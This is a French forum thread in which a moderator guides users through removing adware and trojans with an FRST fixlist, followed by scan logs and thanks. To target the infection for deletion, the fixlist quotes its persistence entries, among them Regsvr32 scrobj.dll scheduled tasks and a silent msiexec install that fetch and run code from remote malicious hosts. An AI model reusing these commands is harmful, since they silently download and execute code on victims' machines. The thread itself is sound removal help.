Signaler

Rootkit ou un truc du genre

Posez votre question Aze - Dernière réponse le 30 avril 2017 à 14:30 par Malekal_morte-
Salut,
ca fait 3 jours que je m'arrache la tête en vain. Avast me fait des alertes très souvent (d'habitude des menaces bloquées avec un lien internet, et une fois un gros message du genre il y a un rootkit: kitty.exe). J'ai utilisé avast, adwcleaner, malwarebytes, sophos, Ccleaner, tout ça plusieurs fois et en mode extrême autant que possible.
J'ai désinstallé le faux Firefox qui s'est installé tout seul, j'ai réinstallé Chrome et les effacer les répertoires contenant des faux Chromes. Quand je scanne avec les anti-virus, je trouve toujours un truc au bout d'un moment (quoique là ça fait bien 1h que j'ai pas eu d'alerte, Est-ce que c'est parce que je suis sous internet explorer pour une fois?).
Je n'ai rien télécharger dernièrement, mais j'ai branché un vieux disque dur externe de sauvegarde. Si c'est lui qui est à l'origine de mes soucis, comment accéder à mes données sans me retaper une infection?
Je sollicite votre aide, ça me ferais pleurer de devoir réinstaller ma tonne de logiciels.

Voici mes fichiers:
FRST http://pjjoint.malekal.com/files.php?id=FRST_20170420_w12h9g15s7u9
Additional http://pjjoint.malekal.com/files.php?id=20170420_x8d15b8n7p7
Shortcuts http://pjjoint.malekal.com/files.php?id=20170420_p6b14j8b12q6

Merci d'avance si qqun peut m'aider.
Afficher la suite 
Utile
+0
plus moins
Voici la correction à effectuer avec FRST. Tu peux t'aider de cette note explicative avec des captures d'écran.

Ouvre le bloc-notes : Touche Windows + R,
Dans le champs "Exécuter", saisir notepad et OK.
Copie/Colle dedans ce qui suit :


CreateRestorePoint:
CloseProcesses:
Task: {1B4E80ED-6498-4C5E-83BC-16E1EAE30F08} - System32\Tasks\Windows-WoShiBeiYongDe => Regsvr32.exe /s /i:hxxp://u76wtn6.x.incapdns.net/?data=zDlkMj1YF8F8MkF5M8U3RWLLRkU4MjQWRkZSNWIxMYFyNkU4OF== scrobj.dll
Task: {D235E823-879C-4E2B-80F3-AB919D0169DE} - System32\Tasks\PowerWord-SCT-JT => Regsvr32.exe /s /i:hxxp://point.lbyhbyc.com/?data=zDlkMj1YF8F8MkF5M8U3RWLLRkU4MjQWRkZSNWIxMYFyNkU4OF== scrobj.dll
R2 GameExplorerUpdate; C:\ProgramData\Microsoft\Windows\GameExplorer\Resources.dll [113664 2017-04-19] () [Fichier non signé]
S2 AppleNotificationsSrv; C:\ProgramData\Software\Apple\Apps\Notification.dll [X]
:\ProgramData\Microsoft\Windows\GameExplorer
2017-04-19 13:38 - 2017-04-19 13:38 - 00000000 ____D C:\Users\Sylvestre\AppData\Local\Dohat
2017-04-19 12:19 - 2017-04-19 12:19 - 00006379 _____ C:\Users\Sylvestre\Documents\free_av_17.3.2291_2017-4-19_12-19-26.avastconfig
2017-04-19 12:07 - 2017-04-19 12:07 - 00000000 ____D C:\Program Files (x86)\58F736DD_jumpeasy
2017-04-19 12:06 - 2017-04-19 20:40 - 00000000 ____D C:\Users\Sylvestre\AppData\Local\3DM
2017-04-19 12:06 - 2017-04-19 12:07 - 00000000 ____D C:\Program Files (x86)\58F736AB_jumpeasy
2017-04-18 13:32 - 2016-12-04 21:11 - 00000000 ____D C:\ProgramData\Spybot - Search & Destroy
2017-04-18 13:32 - 2016-12-04 21:11 - 00000000 ____D C:\Program Files (x86)\Spybot - Search & Destroy 2
HKU\S-1-5-21-4223715313-827883581-3852278338-1001\...\Policies\system: [Shell] explorer.exe,msiexec.exe /i http://point.orangeiloveyou.com/?data=zDlkMj1YF8F8MkF5M8U3RWLLRkU4MjQWRkZSNWIxMYFyNkU4OF%3D%3D /q [Pays US - 104.24.101.133]
Hosts:
EmptyTemp:
RemoveProxy:
Reboot:


Une fois, le texte collé dans le Bloc-notes,
Menu "Fichier" puis "Enregistrer sous",

A gauche, place toi sur le Bureau,

Dans le champs en bas, nom du fichier mets : fixlist.txt
Clique sur "Enregistrer", cela va créer fixlist.txt sur le Bureau.

Relance FRST et clique sur le bouton "Corriger / Fix"
Un redémarrage sera peut-être nécessaire ( pas obligatoire )
Un fichier texte apparait, copie/colle le contenu ici dans un nouveau message.


Redémarre l'ordinateur.



2°)
Réinitialise/Répare les navigateurs WEB concernés par les problèmes :

3°)
fais un nettoyage Malwarebytes - Tutoriel Malwarebytes Anti-Malware version gratuite

Donnez votre avis
Utile
+0
plus moins
Salut, merci pour l'aide, c'est vraiment cool.
Voici mon fichier fixlog:
http://pjjoint.malekal.com/files.php?id=20170420_n8x5g11w13l14

il me reste les étapes 2 et 3 à faire.
Aze- 20 avril 2017 à 11:42
J'ai fait les étapes 2 et 3. Malwarebytes ne me trouve aucune menace. Par contre Adwcleaner me trouve toujours (il l'a toujours détecté) une menace dans ce fichier:
          • [ Fichiers ] *****


Fichier trouvé: C:\Users\Public\Documents\temp.dat

il fait 0 octet et semble avoir été créé à la même minute que mon scan Adwcleaner, c'est louche ce truc....
Pour l'instant je n'ai plus d'alerte Avast ou Malwarebytes, mais ça fait qu'1h que je suis sur le PC.
Répondre
Malekal_morte- 134544Messages postés mercredi 17 mai 2006Date d'inscription ModérateurStatut 25 juillet 2017 Dernière intervention - 20 avril 2017 à 11:47
ça n'a pas d'importance ces détections.
Répondre
Aze- 20 avril 2017 à 11:51
OK merci. Tu peux mettre en résolu je pense. Merci encore!
Répondre
Donnez votre avis
Utile
+0
plus moins
Bonjour, j'ai exactement le même problème que Aze, j'ai même déjà fait des scans avec Malwarebytes et tous les utilitaires les plus courants, sauf FRST car je comprends pas du tout le fonctionnement, j'ai déjà viré kitty.exe .... c'est la 3 e fois que mon Chrome et Firefox sont vérolés et sont déplacé vers des nouveaux dossier dans program files dans des noms de dossier fictifs débiles et différent à chaque fois comme Everbean ...
Bref,
Quelqu'un pourrait m'aider à analyser un rapport FRST si c'est ça qu'il faut faire ? merciii
Malekal_morte- 134544Messages postés mercredi 17 mai 2006Date d'inscription ModérateurStatut 25 juillet 2017 Dernière intervention - 22 avril 2017 à 20:41
Du coup, il reste quel problème ?
Répondre
jeanrembarde- 22 avril 2017 à 21:52
Ah mais du coup, quand tu me dis "Tu as fait l'analyse comme demandé ?" : de quelle analyse parles tu ? (pour pas qu'on confonde).
Sinon j'ai l'impression que depuis j'ai plus de problèmes ... du moins pour l'instant
Répondre
Malekal_morte- 134544Messages postés mercredi 17 mai 2006Date d'inscription ModérateurStatut 25 juillet 2017 Dernière intervention - 23 avril 2017 à 12:53
si tu as fait l'analyse alors c'est good, plus de soucis ?
Répondre
jeanrembarde- 25 avril 2017 à 09:21
Plus vraiment,
Ce matin je fait un scanner Malwarebytes et il me trouve 3 adwares qui ne sont pas censés êtres critiques mais bon ... ça m'inquiête un peu .


Malwarebytes Anti-Malware
www.malwarebytes.org

Date de l'analyse: 25/04/2017
Heure de l'analyse: 08:49
Fichier journal: non malveillants.txt
Administrateur: Oui

Version: 2.2.1.1043
Base de données de programmes malveillants: v2017.04.25.02
Base de données de rootkits: v2017.04.02.01
Licence: Gratuit
Protection contre les programmes malveillants: Désactivé
Protection contre les sites Web malveillants: Désactivé
Autoprotection: Désactivé

Système d'exploitation: Windows 7 Service Pack 1
Processeur: x64
Système de fichiers: NTFS
Utilisateur: PC

Type d'analyse: Analyse des menaces
Résultat: Terminé
Objets analysés: 377916
Temps écoulé: 13 min, 0 s

Mémoire: Activé
Démarrage: Activé
Système de fichiers: Activé
Archives: Activé
Rootkits: Activé
Heuristique: Activé
PUP: Activé
PUM: Activé

Processus: 0
(Aucun élément malveillant détecté)

Modules: 0
(Aucun élément malveillant détecté)

Clés du Registre: 0
(Aucun élément malveillant détecté)

Valeurs du Registre: 0
(Aucun élément malveillant détecté)

Données du Registre: 0
(Aucun élément malveillant détecté)

Dossiers: 1
PUP.Optional.ScreenShot, C:\ProgramData\Microsoft\Windows\Start Menu\Programs\ScreenShot, , [d37326cf2781bd799f0951b28b76b54b],

Fichiers: 2
PUP.Optional.ScreenShot, C:\ProgramData\Microsoft\Windows\Start Menu\Programs\ScreenShot\ScreenShot.lnk, , [d37326cf2781bd799f0951b28b76b54b],
PUP.Optional.ScreenShot, C:\ProgramData\Microsoft\Windows\Start Menu\Programs\ScreenShot\SSInst.lnk, , [d37326cf2781bd799f0951b28b76b54b],

Secteurs physiques: 0
(Aucun élément malveillant détecté)


(end)
Répondre
Malekal_morte- 134544Messages postés mercredi 17 mai 2006Date d'inscription ModérateurStatut 25 juillet 2017 Dernière intervention - 30 avril 2017 à 14:16
Plus de soucis ?
Répondre
Donnez votre avis
Utile
+0
plus moins
Ca l'air plus vicieux que ce que je pensais en fait. Hier Malwarebytes m'avait trouvé 2 malwares, aujourd'hui il me trouve plein de trojans...C'est flippant là à force.
Malwarebytes m'a fait redémarrer, Chrome ne marchait plus (réinstallé) et pas moyen d'envoyer ce post via internet explorer (le site me dit d'activer javascript alors qu'hier ça ne posait pas de souci).

Je suis désolé de devoir redemander de l'aide :=/

Voici mes logs juste après le redémarrage forcé par Malwarebytes

http://pjjoint.malekal.com/files.php?id=FRST_20170422_t514r10w6y6
http://pjjoint.malekal.com/files.php?id=20170422_w9c13w15q8n12
http://pjjoint.malekal.com/files.php?id=20170422_g12k12y6k15q7

Et ce que m'a trouvé Malwarebytes:
Hier:
Fichier: 1
Adware.Elex, C:\PROGRAMDATA\MICROSOFT\WINDOWS\GAMEEXPLORER\RESOURCES.DLL, En quarantaine, [2], [391676],1.0.1772

Aujourd'hui:
Dossier: 7
Trojan.WisdomEyes, C:\Users\Sylvestre\AppData\Roaming\SSMgre\SSRec\JTFW, En quarantaine, [531], [391958],1.0.1781
Trojan.WisdomEyes, C:\Users\Sylvestre\AppData\Roaming\SSMgre\SSRec, En quarantaine, [531], [391958],1.0.1781
Trojan.WisdomEyes, C:\USERS\SYLVESTRE\APPDATA\ROAMING\SSMgre, En quarantaine, [531], [391958],1.0.1781
Trojan.WisdomEyes, C:\Program Files (x86)\BiaoJi\CC, En quarantaine, [531], [391957],1.0.1781
Trojan.WisdomEyes, C:\Program Files (x86)\BiaoJi\FE, En quarantaine, [531], [391957],1.0.1781
Trojan.WisdomEyes, C:\Program Files (x86)\BiaoJi\FS, En quarantaine, [531], [391957],1.0.1781
Trojan.WisdomEyes, C:\PROGRAM FILES (X86)\BiaoJi, En quarantaine, [531], [391957],1.0.1781

Fichier: 1
Trojan.WisdomEyes, C:\Users\Sylvestre\AppData\Roaming\SSMgre\SSRec\JTFW\JTFW.dll, En quarantaine, [531], [391958],1.0.1781
Malekal_morte- 134544Messages postés mercredi 17 mai 2006Date d'inscription ModérateurStatut 25 juillet 2017 Dernière intervention - 22 avril 2017 à 11:15
J'aurai tendance à dire que ce sont des restes.
Répondre
Aze- 22 avril 2017 à 11:19
je n'y connais rien donc je te fais confiance, ça me surprend juste que Malwarebytes les découvre au fur et à mesure et pas tous en même temps.
Répondre
Malekal_morte- 134544Messages postés mercredi 17 mai 2006Date d'inscription ModérateurStatut 25 juillet 2017 Dernière intervention - 22 avril 2017 à 11:57
Parce qu'ils ajoutent des détections.
Pour ça qu'il faudrait faire un scan lundi ou mardi.
Répondre
Aze- 30 avril 2017 à 14:28
De mon côté en tout cas plus de soucis. Merci encore.
Répondre
Malekal_morte- 134544Messages postés mercredi 17 mai 2006Date d'inscription ModérateurStatut 25 juillet 2017 Dernière intervention - 30 avril 2017 à 14:30
de rien :)
Répondre
Donnez votre avis
Utile
+0
plus moins
Ohlala , on est perdus ! J'espère quz la correction va tenir. J'ai jamais vu un virus aussi tenace.
Donnez votre avis

Les membres obtiennent plus de réponses que les utilisateurs anonymes.

Le fait d'être membre vous permet d'avoir un suivi détaillé de vos demandes.

Le fait d'être membre vous permet d'avoir des options supplémentaires.

Vous n'êtes pas encore membre ?

inscrivez-vous, c'est gratuit et ça prend moins d'une minute !